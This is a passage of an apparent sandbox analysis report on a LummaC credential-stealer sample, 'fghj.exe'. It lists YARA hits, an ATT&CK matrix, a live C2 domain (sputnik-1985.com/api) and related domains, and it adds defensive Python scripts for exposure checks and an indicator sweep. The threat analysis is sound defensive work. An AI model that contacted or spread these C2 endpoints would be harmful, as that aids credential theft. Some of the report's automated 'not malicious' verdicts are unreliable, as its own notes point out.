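    # On the affected Windows host, replace demo_run() with find_exposed(roots_from_environment()).
    for hit in demo_run():
        print("exposed:", hit)
```

Run it on the victim profile (or on a mounted image by pointing the three roots at the copied folders); every label it returns names a store whose contents were available to the process that opened it, which is the list to rotate or re-key.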
Source: Yara match | File source: 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1579195348.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count of matching signatures shown in the matrix cell, entries without a count are the matrix's placeholder cells with no matching signature in this analysis)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (2), Command and Scripting Interpreter (2), Native API (1), PowerShell (1), Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (11), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: System Time Discovery (1), Security Software Discovery (131), Virtualization/Sandbox Evasion (11), Process Discovery (2), System Information Discovery (24)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Archive Collected Data (1), Data from Local System (4), Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact

Initial sample

Source | Detection | Scanner | Label
fghj.exe | 66% | Virustotal | (no label)
fghj.exe | 61% | ReversingLabs | Win32.Exploit.LummaC

Dropped files, unpacked PE files, domains: No Antivirus matches in any of these three sub-tables
URLs

Source | Detection | Scanner | Label
https://sputnik-1985.com/.msn | 100% | Avira URL Cloud | malware
https://sputnik-1985.com:443/api6Oa2x-M# | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apiob | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/&0 | 100% | Avira URL Cloud | malware
spellshagey.biz | 100% | Avira URL Cloud | malware
https://community.fastly.steaxU | 0% | Avira URL Cloud | safe
https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH= | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apila | 100% | Avira URL Cloud | malware
http://ocsp.sectigo.com0& | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/ | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apibm | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/04 | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/I3 | 100% | Avira URL Cloud | malware
https://community.fastly.steamstatic.cohK | 0% | Avira URL Cloud | safe

Note: these URLs are carved from process memory, so variants such as /apiob, /apila, /apibm, /04 and the entry with USER_PROFILE_STRING=... appended are the real endpoint followed by adjacent memory bytes. The endpoint actually contacted, https://sputnik-1985.com/api, is listed in the URL reputation table below; block on the host and path rather than on these carved variants.
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | - | high
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | - | high
sputnik-1985.com | 104.21.96.1 | true | false | - | high
sordid-snaked.cyou | unknown | unknown | false | - | high
diffuculttan.xyz | unknown | unknown | false | - | high
effecterectz.xyz | unknown | unknown | false | - | high
spellshagey.biz | unknown | unknown | true | - | unknown
awake-weaves.cyou | unknown | unknown | false | - | high
immureprech.biz | unknown | unknown | false | - | high
wrathful-jammy.cyou | unknown | unknown | false | - | high
deafeninggeh.biz | unknown | unknown | false | - | high
debonairnukk.xyz | unknown | unknown | false | - | high

Note: the "Malicious" and "Reputation" columns here are automated verdicts and contradict the rest of the report. sputnik-1985.com is the only one of these domains that resolved and received the /api traffic, yet it is marked not malicious with high reputation, while every URL under it is flagged 100% by Avira URL Cloud above. Its IP, 104.21.96.1, sits in Cloudflare's address space, so the domain, not the IP, is the indicator. The .cyou/.xyz/.biz names did not resolve during the analysis but were queried by the sample, which is what the "Performs DNS queries to domains with low reputation" signature refers to.
Domain and URL reputation

Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | false | - | high
deafeninggeh.biz | false | - | high
effecterectz.xyz | false | - | high
wrathful-jammy.cyou | false | - | high
https://sputnik-1985.com/api | false | - | high
https://steamcommunity.com/profiles/76561199724331900 | false | - | high
awake-weaves.cyou | false | - | high
immureprech.biz | false | - | high
debonairnukk.xyz | false | - | high
spellshagey.biz | true | Avira URL Cloud: malware | unknown
diffuculttan.xyz | false | - | high
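The two tables above give everything needed for a retrospective network sweep: the domain that actually served the C2 (sputnik-1985.com, path /api), the nine further domains the sample queried, and the one Steam profile page it fetched. The script below is an added example, not part of the Joe Sandbox report; it runs those indicators over DNS and proxy log lines. The log lines and their tab-separated layout (timestamp, source host, query name; timestamp, source host, method, URL) are constructed for the example and are not a real log format, so adapt the field split to whatever your collector emits. Domain matching covers subdomains and is case-insensitive, because a blocklist that only matches the bare name misses a C2 that moves to a subdomain. The Steam profile is matched as an exact URL and steamcommunity.com itself is deliberately not an indicator.

```python
"""Network IOC sweep built from the domain and URL tables of this report.

Added example, not part of the Joe Sandbox report. The indicator sets come
from the report; the log lines below are constructed for the example.
"""
from urllib.parse import urlsplit

# Domains the sample queried. Only sputnik-1985.com resolved during analysis,
# but every queried name is an indicator of this sample's configuration.
C2_DOMAINS = {
    "sputnik-1985.com", "spellshagey.biz", "sordid-snaked.cyou", "diffuculttan.xyz",
    "effecterectz.xyz", "awake-weaves.cyou", "immureprech.biz", "wrathful-jammy.cyou",
    "deafeninggeh.biz", "debonairnukk.xyz",
}
# Exact profile page the sample fetched on a legitimate site; the site is not an IOC.
PROFILE_URLS = {"https://steamcommunity.com/profiles/76561199724331900"}

# Constructed log lines (not real traffic). DNS: ts, src, query. HTTP: ts, src, method, url.
DNS_LOG = """\
1736450001.101\t10.0.0.17\tsteamcommunity.com
1736450001.340\t10.0.0.17\tsputnik-1985.com
1736450002.002\t10.0.0.17\tsordid-snaked.cyou
1736450002.510\t10.0.0.22\tcommunity.fastly.steamstatic.com
1736450003.111\t10.0.0.17\tcdn.SPUTNIK-1985.com.
"""
HTTP_LOG = """\
1736450001.200\t10.0.0.17\tGET\thttps://steamcommunity.com/profiles/76561199724331900
1736450001.250\t10.0.0.22\tGET\thttps://steamcommunity.com/id/example
1736450004.000\t10.0.0.17\tPOST\thttps://sputnik-1985.com/api
"""


def domain_matches(name):
    """True for an IOC domain or any subdomain of one; case-insensitive, trailing dot tolerated."""
    labels = name.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in C2_DOMAINS for i in range(len(labels)))


def url_matches(url):
    """Exact URL match after lower-casing scheme/host and dropping a trailing slash."""
    p = urlsplit(url)
    norm = f"{p.scheme.lower()}://{p.netloc.lower()}{p.path.rstrip('/')}"
    return norm in PROFILE_URLS


def sweep(dns_lines, http_lines):
    """Return (src, kind, indicator) for every log line that touches an IOC."""
    hits = []
    for line in dns_lines.splitlines():
        _ts, src, query = line.split("\t")
        if domain_matches(query):
            hits.append((src, "dns", query.lower().rstrip(".")))
    for line in http_lines.splitlines():
        _ts, src, _method, url = line.split("\t")
        if domain_matches(urlsplit(url).hostname or ""):
            hits.append((src, "http-c2", url))
        elif url_matches(url):
            hits.append((src, "http-profile", url))
    return hits


def hosts_with_c2(hits):
    """Distinct source hosts that reached C2 domains; profile fetches alone are not counted."""
    return sorted({src for src, kind, _ in hits if kind != "http-profile"})


if __name__ == "__main__":
    found = sweep(DNS_LOG, HTTP_LOG)
    for src, kind, ioc in found:
        print(f"{src}\t{kind}\t{ioc}")
    print("hosts with C2 contact:", hosts_with_c2(found))
```

A host that only fetched the profile page is worth a look but is not by itself evidence of infection, since the page is public; a host that resolved or posted to any of the C2_DOMAINS is, which is why hosts_with_c2 separates the two.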
URLs found in process memory

Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://player.vimeo.com | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | fghj.exe | false | - | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steamcommunity.com/?subsection=broadcasts | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com/apiob | fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://store.steampowered.com/subscriber_agreement/ | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.gstatic.cn/recaptcha/ | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com/.msn | fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/css/promo/summer201 | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com:443/api6Oa2x-M# | fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.valvesoftware.com/legal.htm | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.youtube.com | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0 | fghj.exe | false | - | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_ | fghj.exe | false | - | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://s.ytimg.com; | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english& | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/ | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steam.tv/ | fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/profile.j | fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | fghj.exe | false | - | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en | fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://store.steampowered.com/privacy_agreement/ | fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH= | fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://store.steampowered.com/points/shop/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 